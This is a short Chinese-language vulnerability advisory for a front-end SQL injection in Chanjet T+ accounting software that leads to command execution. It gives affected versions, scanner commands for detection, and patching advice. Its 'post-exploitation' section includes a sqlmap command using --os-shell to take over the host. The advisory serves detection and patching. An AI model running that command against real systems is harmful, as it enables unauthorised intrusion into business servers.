漏洞描述

❝

畅捷通T+是一款主要针对中小型工贸和商贸企业的财务业务一体化应用，融入了社交化、移动化、物联网、电子商务、互联网信息订阅等元素。畅捷通T+存在前台SQL注入，导致命令执行。

影响范围

• T+版本13.0、T+版本16.0

• 官方安全补丁<13.000.001.0404

漏洞检测：

nuclei

访问后台缺陷功能路径,nuclei检测命令如下：

./nuclei -u http://www.xxx.com/ -t ./ultimaste-nuclei-templates/yongyou-chanjettplus/chanjettplus-sqli.yaml

nuclei-templates:

https://github.com/UltimateSec/ultimaste-nuclei-templates/blob/main/yongyou-chanjettplus/chanjettplus-sqli.yaml

X-POC远程检测工具

检测方法

xpoc -r 102 -t 扫描目标URL

工具获取方式: 后台回复“X-POC”

牧云本地检测工具

检测方法

在本地主机上执行以下命令即可无害化扫描：

chanjet_tpluspop_sqli_scanner_windows_amd64.exe scan --output result.json

工具获取方式

❝

https://stack.chaitin.com/tool/detail?id=1178

后利用思路：

用友畅捷通T+使用.NET开发通常配套使用SqlServer数据库，默认环境下利用此漏洞攻击者可以实现远程命令执行。

直接使用sql注入神器sqlmap获取主机权限即可：

python3 sqlmap.py -r post.txt  --random-agent -v 3 --dbms mssql --hex --os-shell

修复方案

安装官方最新补丁包

参考

https://mp.weixin.qq.com/s?__biz=Mzg5MDcyODg4OA==&mid=2247483692&idx=1&sn=db259bd3cba4895ee83078e0387b7dac
https://stack.chaitin.com/techblog/detail?id=110